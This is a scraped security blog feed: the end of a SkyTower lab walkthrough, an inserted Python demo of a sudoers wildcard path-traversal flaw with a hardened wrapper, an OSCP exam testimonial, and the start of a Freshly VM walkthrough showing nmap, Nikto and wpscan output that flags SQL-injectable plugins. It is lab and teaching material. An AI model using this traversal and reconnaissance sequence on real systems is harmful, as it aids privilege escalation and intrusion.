sara@SkyTower:~$ su root<br />
Password: <br />
root@SkyTower:~#
</td>
</tr>
</tbody></table>
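<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
The ../ trick deserves a closer look, because it is a common sudoers mistake. sudo compares the command line as typed against the rule; it never canonicalises the path. As an added example (my own code, not the box's sudoers file and not from the original post), assume the rule behind sara's access looked like <b>sara ALL=(root) /bin/ls /accounts/*, /bin/cat /accounts/*</b>; that line is an assumption, the actual entry was not captured. The sudoers(5) manual notes that a wildcard in a command argument also matches “/”, so /accounts/../root/flag.txt satisfies such a rule. The Python below first demonstrates that match with fnmatch, then shows a small wrapper that could be granted in sudoers instead of bare ls and cat: it resolves the argument with os.path.realpath (following both “..” and symlinks) and refuses anything that does not land under /accounts. The sandbox it builds under a temporary directory, the file names and contents, and the /usr/local/sbin/accounts-view name are all constructed for the demo.</div>

```python
import fnmatch
import os
import subprocess
import sys
import tempfile

# Assumed sudoers rule behind "sudo ls /accounts/../root/" (not shown on the
# page; a rule of this shape is the usual way to end up with that behaviour):
#   sara ALL=(root) /bin/ls /accounts/*, /bin/cat /accounts/*
# sudoers matches arguments with shell-style wildcards in which '*' also
# matches '/', so "/accounts/../root/flag.txt" satisfies the rule.
# Replacement rule, granting this wrapper instead of bare ls/cat (hypothetical):
#   sara ALL=(root) /usr/local/sbin/accounts-view
ALLOWED_ROOT = "/accounts"
COMMANDS = {"ls": ["/bin/ls", "-la", "--"], "cat": ["/bin/cat", "--"]}


def sudoers_wildcard_matches(pattern: str, argument: str) -> bool:
    """Mirror sudoers argument matching: '*' crosses directory boundaries."""
    return fnmatch.fnmatchcase(argument, pattern)


def resolve_inside(path: str, allowed_root: str = ALLOWED_ROOT) -> str:
    """Return the canonical path if it lies under allowed_root, else raise.

    realpath resolves every '..' and symlink first, and commonpath compares
    whole path components, so "/accountsX/..." and a symlink planted inside
    /accounts that points at /root are both rejected."""
    root = os.path.realpath(allowed_root)
    target = os.path.realpath(path)
    if os.path.commonpath([root, target]) != root:
        raise PermissionError(f"{path!r} resolves to {target!r}, outside {root!r}")
    return target


def accounts_view(action: str, path: str, allowed_root: str = ALLOWED_ROOT) -> int:
    """Privileged entry point: only ls/cat, only on validated paths."""
    if action not in COMMANDS:
        print("usage: accounts-view ls|cat PATH", file=sys.stderr)
        return 2
    try:
        target = resolve_inside(path, allowed_root)
    except PermissionError as exc:
        print(f"refused: {exc}", file=sys.stderr)
        return 1
    return subprocess.run(COMMANDS[action] + [target]).returncode


def demo() -> dict:
    """Constructed sandbox standing in for /accounts and /root on the box."""
    base = tempfile.mkdtemp()
    accounts = os.path.join(base, "accounts")
    root_home = os.path.join(base, "root")
    os.makedirs(accounts)
    os.makedirs(root_home)
    with open(os.path.join(accounts, "sara.txt"), "w") as fh:
        fh.write("balance: 0\n")
    with open(os.path.join(root_home, "flag.txt"), "w") as fh:
        fh.write("constructed flag\n")
    # A symlink inside the allowed tree that points outside it.
    os.symlink(os.path.join(root_home, "flag.txt"), os.path.join(accounts, "escape"))
    traversal = os.path.join(accounts, "..", "root", "flag.txt")
    return {
        "wildcard_lets_traversal_through":
            sudoers_wildcard_matches("/accounts/*", "/accounts/../root/flag.txt"),
        "inside_allowed": accounts_view("cat", os.path.join(accounts, "sara.txt"), accounts) == 0,
        "traversal_refused": accounts_view("cat", traversal, accounts) == 1,
        "symlink_refused": accounts_view("cat", os.path.join(accounts, "escape"), accounts) == 1,
    }


if __name__ == "__main__":
    if len(sys.argv) == 3:
        sys.exit(accounts_view(sys.argv[1], sys.argv[2]))
    for name, ok in demo().items():
        print(f"{name}: {ok}")
```

Installed as a wrapper, the script is what sudoers grants; the user never gets to choose the binary or pass extra flags, and the only argument that reaches ls or cat is one that has already been resolved and checked. A wildcard-free rule naming fixed arguments would also have worked here, but it would not survive the first request to add another file.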
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">Well, that's all for this one. I really enjoyed this challenge. I'll keep my eyes open for more from the folks at TeleSpace Systems.</span></span></span></span></span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<br />
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: 12pt;">Court
Graham, signing off....</span></span></span></div>
</div>
Court Graham, CISSP, OSCP, C|EH, PCI-QSA, ITILhttp://www.blogger.com/profile/12137980462590589771noreply@blogger.com0tag:blogger.com,1999:blog-4508217951330976703.post-63189539705263864632015-05-27T22:13:00.000-04:002015-05-27T22:13:08.877-04:00Offensive Security PWK Course and Exam Testimonial<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9qBj-qdVGQ1LloRVaTUdFoTjq_4ilzMZ9tgdd3MI8vw4b_IXtPsVz60mWdjTrHE4bGyZrQZ1yqBnTcGNxJu_qtGR8H1iYyZO9q3oo6RY0vdY7HHNsmVbge0qcruyMxeecqQgz_7PMtWg4/s1600/ocsp.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="50" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9qBj-qdVGQ1LloRVaTUdFoTjq_4ilzMZ9tgdd3MI8vw4b_IXtPsVz60mWdjTrHE4bGyZrQZ1yqBnTcGNxJu_qtGR8H1iYyZO9q3oo6RY0vdY7HHNsmVbge0qcruyMxeecqQgz_7PMtWg4/s400/ocsp.jpg" width="400" /></a></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
I recently completed
the Penetration Testing with Kali Linux course and successfully
passed the Offensive Security Certified Professional Exam. However,
the path to success was not without its hurdles. I'm writing this
course/exam review to paint a picture of what to expect, as well as
shine some light on the mental preparation necessary.</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
If you are reading this review, I'm just about certain that you know all about the registration process, course syllabus, video and printed material
format, hands on lab environment and examination process. If not
please refer to the <a href="https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/">Offensive
Security training and certification websites</a>.
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
As with many prospective students of the course, I have a full basket of life responsibilities, including but not limited to a full-time job as an information security professional, being a husband and father of 3 boys, a 1-hour commute to and from the office, and an infinite honey-do list. With those responsibilities alone you may wonder when I would have time to take on this sort of certification challenge. The short answer is that you'll need to cut into your normal sleep hours.</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
I've broken down my training, lab and exam rants into a numbered list of preconceptions, misconceptions, and suggestions:</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<b>Course & Exercises</b>
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<ol>
<li><div style="line-height: 100%; margin-bottom: 0in;">
<b>The PWK Course covers all topics necessary for the exam</b> – I believe this to be true; however, make sure to study the theory and research the topics on your own. Use both the exercises and lab time to make the practical application of each topic second nature.
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
</li>
<li><div style="line-height: 100%; margin-bottom: 0in;">
<b>You have to complete and submit all of the exercises in order to register for the exam</b> – This is not true. The Offensive Security staff will definitely not impose such a restriction on the student. You'll soon find out how much of the responsibility is on you to make sure you are ready. Don't take this as an opportunity to skip the exercises; they're there for a reason.</div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
</li>
<li><div style="line-height: 100%; margin-bottom: 0in;">
<b>You can study by reviewing the videos and the documentation and do not require lab time</b> – This is partially true. I'll explain: depending on the time that you can invest (daily/nightly), the initial lab time may only be lightly utilized. Without giving too much away, the early portion of the training is centered around enumeration of the WAN, the LAN and individual systems, and for good reason. With that said, you'll be able to sharpen these skills in the lab, but this will not require the amount of time that you'll have to invest later in the course. If you find that your initial lab time is running short, don't panic; continue to take the necessary time to study the contents of the videos and printed material.
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<b>Don't hesitate to purchase more lab time if necessary!</b></div>
</li>
</ol>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<b>The Lab Environment</b></div>
<div style="line-height: 100%; margin-bottom: 0in; text-indent: -0.25in;">
<br />
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
The PWK lab environment consists of approximately 50 machines which span 3 different networks. This is a true playground for the security enthusiast. The degree of difficulty varies from one machine to the next.
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<ol>
<li><div style="line-height: 100%; margin-bottom: 0in;">
<b>You do not have to compromise all 50 machines</b> – As mentioned in my previous point, it is your responsibility to best prepare yourself for the OSCP exam. These machines are priceless in the pursuit of preparation, but it's easy to lose focus and forget about the primary goal, the OSCP certification. You can always purchase lab time with the intent of owning all of the machines if that's your desire.</div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
</li>
<li><div style="line-height: 100%; margin-bottom: 0in;">
<b>Regulate the amount of lab assistance you receive</b> – The lab and the associated freenode #offsec IRC channel serve as a great resource to communicate with your peers and the Offensive Security administrators. The Offsec admins are wise and will not give you too much information. The prize is truly in the pursuit; they're aware of this and will not hesitate to tell you to “Try Harder”.
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<b>Resist the
temptation to turn to your peers for too much guidance; it will hurt
you in the long run!</b></div>
</li>
<li><div style="line-height: 100%; margin-bottom: 0in;">
<b style="line-height: 100%;">Take detailed notes during your lab conquest</b><span style="line-height: 100%;"> – This detailed note-taking process will come in handy, as during the exam you will inevitably wonder “How did I perform that one exploit? What was the syntax of that one command?” Your notes will save you time and serve as a great study resource even when you are not online. KeepNote, which is available on your Kali Linux image, is in my opinion the best tool for note keeping.</span></div>
</li>
</ol>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<b>The Exam</b></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div style="font-weight: normal; line-height: 100%; margin-bottom: 0in;">
I have taken countless IT and security certification exams throughout my career, and I had never failed an attempt; until now...</div>
<div style="font-weight: normal; line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div style="font-weight: normal; line-height: 100%; margin-bottom: 0in;">
I don't say this to scare or discourage anyone. First off, there is no such thing as failure, just continued opportunities for learning. Corny, but true.</div>
<div style="font-weight: normal; line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div style="font-weight: normal; line-height: 100%; margin-bottom: 0in;">
Actually, the third time was a charm. I know: how did that happen? Let me tell you, so you can avoid the same mistakes; believe me, it's possible!</div>
<div style="font-weight: normal; line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div style="font-weight: normal; line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
As you all know,
you have approximately 24 hours to complete the required exam
objectives which are communicated to you the day of the exam via
email. You'll have a certain number of machines with associated
scored objectives. Achieving these objectives while documenting your
process and proof will give you a passing score. Once achieved you
must submit the penetration test report to Offsec for evaluation
(Pass/Fail).
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
OK, now here are some do's and don'ts:</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<ul>
<li><div style="line-height: 100%; margin-bottom: 0in;">
<b>Do not allow your eyes to deceive you</b> – You have just completed countless hours of theory and practical application of the techniques necessary to pass the exam, or better yet, to own the box at hand! Avoid losing sight of the trees for the forest: don't worry about passing the exam until you're done with the last box. The thought of, and desire for, passing can be distracting.
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
If you see a certain vulnerability, trust in your training: <b>if it looks like chicken and tastes like chicken, it's probably chicken!</b>
</div>
</li>
</ul>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKHA36TX-A29KxiZxHWJ1qIx-wRcrD1PFH3HSGfQaXh8wW1OlTwKB1nEb3oi6ggj96hRiDsZrMBhrcbQbQaAjyuo75kfUW3PpU0JrP-39GhLjGRwvaWvaN9TVLkC1hGhv76L6Ch_8o7vF1/s1600/chicken.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKHA36TX-A29KxiZxHWJ1qIx-wRcrD1PFH3HSGfQaXh8wW1OlTwKB1nEb3oi6ggj96hRiDsZrMBhrcbQbQaAjyuo75kfUW3PpU0JrP-39GhLjGRwvaWvaN9TVLkC1hGhv76L6Ch_8o7vF1/s320/chicken.jpg" width="320" /></a></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
This was the culprit during my first attempt: don't overthink during the challenge, you know how to do this stuff. Don't let the subtle differences between the lab and the exam throw you for a loop; use what you've been trained to do.
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<ul>
<li><div style="line-height: 100%; margin-bottom: 0in;">
<b>Prepare exploits and a list of go-to commands prior to the test </b>– Yes, you'll have your course materials at your disposal during the exam, but you will not want to flip through pages or take the time to watch videos during the exam. Trust me, <i><b>it's the shortest 24 hours of your life</b></i>. I created a spreadsheet, which I'll refine and post for download, that I call my Warchess. It contains the step-by-step stack-based buffer overflow exploitation process as taught in the Offsec training (I was able to use this to make sure I hadn't missed any necessary steps), common commands, shell escape sequences, Netcat, Python and Perl bind and reverse shell syntax, and a list of my pre-compiled Linux and Windows remote and local exploits.</div>
</li>
</ul>
<ul>
<li><div style="line-height: 100%; margin-bottom: 0in;">
<b>Get plenty
of rest</b> – This was partially the culprit during my second
attempt. My anticipation for the exam would not allow me to sleep
well the night before. I got 3 hours of sleep in total. Ultimately I
knew how to achieve success, but did not have the energy and mental
fortitude.</div>
</li>
</ul>
<ul>
<li><div style="line-height: 100%; margin-bottom: 0in;">
<b>Download and practice vulnerable applications to exploit </b>– Exploit-DB has several published remote buffer overflow exploits with downloadable links to the vulnerable applications for your own PoCs. Do this; master these exploits and all the curveballs prior to potentially seeing them during the exam.
</div>
</li>
</ul>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjno8eDUwHJOL0PgRTp4cvmHh6xWT4ARm2Ybox70jgtBXhX7llfhlCwwGOx6hhFArPv7dCbEhe3zmE5i1fQ66ndCPYCVZa6oXmr4_CShfOgKZ8dD5eJgRuQSZCeOvhNfsJhy-nzdDYSh-tf/s1600/Screenshot+from+2015-05-27+21%253A20%253A36.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="25" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjno8eDUwHJOL0PgRTp4cvmHh6xWT4ARm2Ybox70jgtBXhX7llfhlCwwGOx6hhFArPv7dCbEhe3zmE5i1fQ66ndCPYCVZa6oXmr4_CShfOgKZ8dD5eJgRuQSZCeOvhNfsJhy-nzdDYSh-tf/s400/Screenshot+from+2015-05-27+21%253A20%253A36.png" width="400" /></a></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<ul>
<li><div style="line-height: 100%; margin-bottom: 0in;">
<b>Take frequent breaks</b> – I know this is in a lot of posts; however, do not ignore it. Sitting in one place and concentrating on the exam can be extremely stressful on the body. Make sure you stretch and keep the blood circulating. Also, your mind will benefit from switching gears.
</div>
</li>
</ul>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
So in summary, I made a couple of fatal mistakes:
</div>
<ul>
<li><div style="line-height: 100%; margin-bottom: 0in;">
Not following through with known exploits from the training</div>
</li>
<li><div style="line-height: 100%; margin-bottom: 0in;">
Not getting enough sleep the night before the examination</div>
</li>
<li><div style="line-height: 100%; margin-bottom: 0in;">
Not adequately preparing for the unknown</div>
</li>
</ul>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
Ultimately, after overcoming my issues, I was able to complete the exam in about 8 hours. I used a bit of the remaining time to put the finishing touches on my lab/exam report. The good folks at Offensive Security sent me a congratulations email the same day, awarding me the elusive OSCP certification; by far my best certification accomplishment thus far.</div>
<div>
<span style="line-height: 16px;"><br /></span></div>
<div>
<span style="line-height: 100%; text-indent: -0.25in;">I will continue to hone my craft in preparation for Cracking the
Perimeter/OSCE later this year</span></div>
</div>
Court Graham, CISSP, OSCP, C|EH, PCI-QSA, ITILhttp://www.blogger.com/profile/12137980462590589771noreply@blogger.com7tag:blogger.com,1999:blog-4508217951330976703.post-9694575449710129632015-05-27T14:57:00.000-04:002015-05-27T22:25:47.381-04:00Freshly Vulnerable VM Walkthrough<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: left;">
<br /></div>
Today I will be explaining how I was able to complete the <a href="http://www.top-hat-sec.com/" target="_blank">Top-Hat-Sec</a> Freshly Challenge. The goal of this challenge is to break into the machine via the web and find the secret hidden in a sensitive file. I took it just a tiny bit further and gained a root shell. Here's what I did:<br />
<br />
<h3 style="text-align: left;">
<b>Enumeration</b></h3>
<div style="text-align: left;">
<b><br /></b></div>
<div style="text-align: left;">
After spinning up the VM in VirtualBox, I located its DHCP address on my local NAT network and had at it:</div>
<br />
root@kali:~# nmap -A 10.1.1.11<br />
<br />
Starting Nmap 6.47 ( http://nmap.org ) at 2015-05-22 21:09 EDT<br />
Nmap scan report for 10.1.1.11<br />
Host is up (0.00052s latency).<br />
Not shown: 997 closed ports<br />
PORT STATE SERVICE VERSION<br />
<b>
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))</b><br />
|_http-title: Site doesn't have a title (text/html).<br />
<b>
443/tcp open ssl/http Apache httpd</b><br />
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)<br />
|_http-title: Site doesn't have a title (text/html).<br />
| ssl-cert: Subject: commonName=www.example.com<br />
| Not valid before: 2015-02-17T03:30:05+00:00<br />
|_Not valid after: 2025-02-14T03:30:05+00:00<br />
|_ssl-date: 1901-12-13T20:45:52+00:00; -113y160d4h24m13s from local time.<br />
<b>
8080/tcp open http Apache httpd</b><br />
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)<br />
|_http-title: Site doesn't have a title (text/html).<br />
MAC Address: 08:00:27:F2:73:82 (Cadmus Computer Systems)<br />
<br />
Network Distance: 1 hop<br />
<br />
TRACEROUTE<br />
HOP RTT ADDRESS<br />
1 0.52 ms 10.1.1.11<br />
<br />
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .<br />
Nmap done: 1 IP address (1 host up) scanned in 26.27 seconds<br />
root@kali:~#<br />
<br />
______________________________________________________________________________<br />
<br />
<br />
A quick viewing of some of the hosted webpages brought this challenge close to my geek heart:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwp0vpoXwikWBsCS1C0XGrsx8EiZk0RR0YOOlVOemizk8qRzv4YrQVXjA9ogLOLo3f6xZvnaJTjj-JHTItFOqXLcK3WHkAkH08PJwBu2lvtbSrVdB_Szboq9bfb6A9HVHvZNzpGP93oVO0/s1600/Screenshot+from+2015-05-22+21%253A15%253A25.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwp0vpoXwikWBsCS1C0XGrsx8EiZk0RR0YOOlVOemizk8qRzv4YrQVXjA9ogLOLo3f6xZvnaJTjj-JHTItFOqXLcK3WHkAkH08PJwBu2lvtbSrVdB_Szboq9bfb6A9HVHvZNzpGP93oVO0/s400/Screenshot+from+2015-05-22+21%253A15%253A25.png" width="400" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
Paying heed to the Jedi Mind Trick, I pushed forward </div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: left;">
Continuing with my normal enumeration process, I used Nikto to identify any low-hanging fruit or interesting directories. </div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Note: I initially overlooked this, but the Nikto scan on port 80 found login.php, which turned out to be the way in:<br />
<br />
<br />
root@kali:~# nikto -h 10.1.1.11<br />
- Nikto v2.1.6<br />
---------------------------------------------------------------------------<br />
+ Target IP: 10.1.1.11<br />
+ Target Hostname: 10.1.1.11<br />
+ Target Port: 80<br />
+ Start Time: 2015-05-22 23:47:57 (GMT-4)<br />
---------------------------------------------------------------------------<br />
+ Server: Apache/2.4.7 (Ubuntu)<br />
+ Server leaks inodes via ETags, header found with file /, fields: 0x2f 0x50f4228b8016c <br />
+ The anti-clickjacking X-Frame-Options header is not present.<br />
+ No CGI Directories found (use '-C all' to force check all possible dirs)<br />
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST <br />
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.5<br />
+ Uncommon header 'x-webkit-csp' found, with contents: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';style-src 'self' 'unsafe-inline';img-src 'self' data: *.tile.openstreetmap.org *.tile.opencyclemap.org;<br />
+ Uncommon header 'x-ob_mode' found, with contents: 0<br />
+ Uncommon header 'x-content-security-policy' found, with contents: default-src 'self' ;options inline-script eval-script;img-src 'self' data: *.tile.openstreetmap.org *.tile.opencyclemap.org;<br />
+ OSVDB-3233: /icons/README: Apache default file found.<br />
+ <b>/login.php: Admin login page/section found.</b><br />
+ /phpmyadmin/: phpMyAdmin directory found<br />
+ 6732 requests: 0 error(s) and 10 item(s) reported on remote host<br />
+ End Time: 2015-05-22 23:48:12 (GMT-4) (15 seconds)<br />
---------------------------------------------------------------------------<br />
+ 1 host(s) tested<br />
root@kali:~# </div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
______________________________________________________________________________</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Needing more information, I turned to DirBuster to reveal the site's structure and any hidden pages. I quickly found a WordPress site hosted on both port 443 and port 8080. </div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuhyE1f0gLRjQaqcHaH-xKliKulMbKtG2Mq4LscmzF7GUVEwTv0cDYPMv-RkXL4rVA5T1IwHrKNdGd0OEtcb6cl_4r4mzmVGqG7mhuiz5COB_YR1zQ6oN_ev6RVW4Mi_hjNpUxzllnXJgU/s1600/Screenshot+from+2015-05-22+21%253A17%253A28.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="243" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuhyE1f0gLRjQaqcHaH-xKliKulMbKtG2Mq4LscmzF7GUVEwTv0cDYPMv-RkXL4rVA5T1IwHrKNdGd0OEtcb6cl_4r4mzmVGqG7mhuiz5COB_YR1zQ6oN_ev6RVW4Mi_hjNpUxzllnXJgU/s400/Screenshot+from+2015-05-22+21%253A17%253A28.png" width="400" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
OK, at this point I was starting to get happy, given the sheer number of WordPress vulnerabilities out there. I turned to wpscan to enumerate users and look for vulnerable plugins:</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
root@kali:~# wpscan --url 10.1.1.11:8080/wordpress/ --enumerate u<br />
_______________________________________________________________<br />
__ _______ _____ <br />
\ \ / / __ \ / ____| <br />
\ \ /\ / /| |__) | (___ ___ __ _ _ __ <br />
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ <br />
\ /\ / | | ____) | (__| (_| | | | |<br />
\/ \/ |_| |_____/ \___|\__,_|_| |_|<br />
<br />
WordPress Security Scanner by the WPScan Team <br />
Version 2.6<br />
Sponsored by Sucuri - https://sucuri.net<br />
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_<br />
_______________________________________________________________<br />
<br />
[+] URL: http://10.1.1.11:8080/wordpress/<br />
[+] Started: Fri May 22 21:41:21 2015<br />
<br />
[!] The WordPress 'http://10.1.1.11:8080/wordpress/readme.html' file exists exposing a version number<br />
[!] Full Path Disclosure (FPD) in: 'http://10.1.1.11:8080/wordpress/wp-includes/rss-functions.php'<br />
[+] Interesting header: SERVER: Apache<br />
[+] Interesting header: X-FRAME-OPTIONS: SAMEORIGIN<br />
[+] XML-RPC Interface available under: http://10.1.1.11:8080/wordpress/xmlrpc.php<br />
<br />
[+] WordPress version 4.1 identified from meta generator<br />
<br />
[+] Enumerating plugins from passive detection ...<br />
| 4 plugins found:<br />
<br />
[+] Name: cart66-lite - v1.5.3<br />
| Location: http://10.1.1.11:8080/wordpress/wp-content/plugins/cart66-lite/<br />
| Readme: http://10.1.1.11:8080/wordpress/wp-content/plugins/cart66-lite/readme.txt<br />
<br />
[!] <b>Title: Cart66 Lite <= 1.5.3 - SQL Injection</b><br />
Reference: https://wpvulndb.com/vulnerabilities/7737<br />
Reference: https://research.g0blin.co.uk/g0blin-00022/<br />
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9442<br />
[i] Fixed in: 1.5.4<br />
<br />
[+] Name: contact-form-7 - v4.1<br />
| Location: http://10.1.1.11:8080/wordpress/wp-content/plugins/contact-form-7/<br />
| Readme: http://10.1.1.11:8080/wordpress/wp-content/plugins/contact-form-7/readme.txt<br />
<br />
[+] Name: proplayer - v4.7.9.1<br />
| Location: http://10.1.1.11:8080/wordpress/wp-content/plugins/proplayer/<br />
| Readme: http://10.1.1.11:8080/wordpress/wp-content/plugins/proplayer/readme.txt<br />
<br />
[!] <b>Title: ProPlayer 4.7.9.1 - SQL Injection</b><br />
Reference: https://wpvulndb.com/vulnerabilities/6912<br />
Reference: http://osvdb.org/93564<br />
Reference: http://www.exploit-db.com/exploits/25605/<br />
<br />
[+] Name: all-in-one-seo-pack - v2.2.5.1<br />
| Location: http://10.1.1.11:8080/wordpress/wp-content/plugins/all-in-one-seo-pack/<br />
| Readme: http://10.1.1.11:8080/wordpress/wp-content/plugins/all-in-one-seo-pack/readme.txt<br />
<br />
[+] Enumerating usernames ...<br />
[+] Identified the following 1 user/s:<br />
+----+-------+-------+<br />
| Id | Login | Name |<br />
+----+-------+-------+<br />
| 1 | admin | admin |<br />
+----+-------+-------+<br />
[!] Default first WordPress username 'admin' is still used<br />
<br />
[+] Finished: Fri May 22 21:41:28 2015<br />
[+] Memory used: 3.234 MB<br />
[+] Elapsed time: 00:00:06<br />
root@kali:~# </div>
<div style="text-align: left;">
_____________________________________________________________________________</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
OK, there are a couple of SQL injection findings. The Cart66 Lite one requires credentials, which I don't have yet.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
The ProPlayer injection simply didn't work for me...</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
I also tried to brute-force the admin user's password, unsuccessfully. I must have overlooked something. Going back through my notes, I found the login.php page in my Nikto output:</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Browsing to it I found a simple login page which had SQL injection written all over it:</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX7VPKhEUhl-qVQe2ZKVDPDIyLFDX74V-v7VxnzYfZqothqaM9uHjxjgPd1ORF7HInxMDGUZI4O0Dv-4fpHADjYBYCX-K8bAvAQa-VLdOiI-32I61aYsFB6iWwb0oK6fO-cDP-LqDZoEna/s1600/Screenshot+from+2015-05-27+13%253A49%253A43.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX7VPKhEUhl-qVQe2ZKVDPDIyLFDX74V-v7VxnzYfZqothqaM9uHjxjgPd1ORF7HInxMDGUZI4O0Dv-4fpHADjYBYCX-K8bAvAQa-VLdOiI-32I61aYsFB6iWwb0oK6fO-cDP-LqDZoEna/s400/Screenshot+from+2015-05-27+13%253A49%253A43.png" width="400" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
I started with a handful of SQL injection test strings; the author of the VM helped out by printing a 1 or 0 on the page, which gives a clean boolean oracle to work with.</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
